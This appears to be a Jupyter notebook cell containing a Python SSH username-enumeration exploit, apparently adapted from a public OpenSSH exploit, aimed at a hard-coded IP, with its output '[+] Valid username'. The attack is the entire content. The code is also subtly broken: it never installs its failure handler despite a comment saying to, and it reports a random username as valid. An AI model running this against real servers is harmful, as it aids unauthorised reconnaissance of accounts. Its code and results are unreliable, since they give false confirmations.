In [5]:
#!/usr/bin/env python3

# 45210
import argparse
import logging
import paramiko
import socket
import sys


class InvalidUsername(Exception):
    pass


def add_boolean(*args, **kwargs):
    pass


# Access the class variable _HANDLER_TABLE instead of _handler_table
old_service_accept = paramiko.auth_handler.AuthHandler.auth_none


def service_accept(*args, **kwargs):
    paramiko.message.Message.add_boolean = add_boolean
    return old_service_accept(*args, **kwargs)


def userauth_failure(*args, **kwargs):
    raise InvalidUsername()


# Update the _HANDLER_TABLE

# Suppress Paramiko's logging if not needed
logging.getLogger("paramiko.transport").addHandler(logging.NullHandler())

# Define your arguments here or use argparse for dynamic input
args = {
    "hostname": "198.18.0.246",
    "port": 22,
    "username": "root1sdasda",
}

# Alternatively, using argparse for dynamic input
# Uncomment the following lines if you prefer using command-line arguments

# arg_parser = argparse.ArgumentParser(description="SSH Username Validator")
# arg_parser.add_argument("hostname", type=str, help="Target SSH server hostname or IP")
# arg_parser.add_argument("--port", type=int, default=22, help="Target SSH server port")
# arg_parser.add_argument("username", type=str, help="Username to validate")
# args = arg_parser.parse_args()

sock = socket.socket()
try:
    sock.connect((args["hostname"], args["port"]))
except socket.error:
    print("[-] Failed to connect")
    sys.exit(1)

transport = paramiko.transport.Transport(sock)
try:
    transport.start_client(timeout=10)
except paramiko.ssh_exception.SSHException:
    print("[-] Failed to negotiate SSH transport")
    sys.exit(2)

try:
    # Generate a temporary RSA key for authentication attempt
    temp_key = paramiko.RSAKey.generate(2048)
    transport.auth_publickey(args["username"], temp_key)
except InvalidUsername:
    print("[*] Invalid username")
    sys.exit(3)
except paramiko.ssh_exception.AuthenticationException:
    print("[+] Valid username")
finally:
    transport.close()
    sock.close()

[+] Valid username
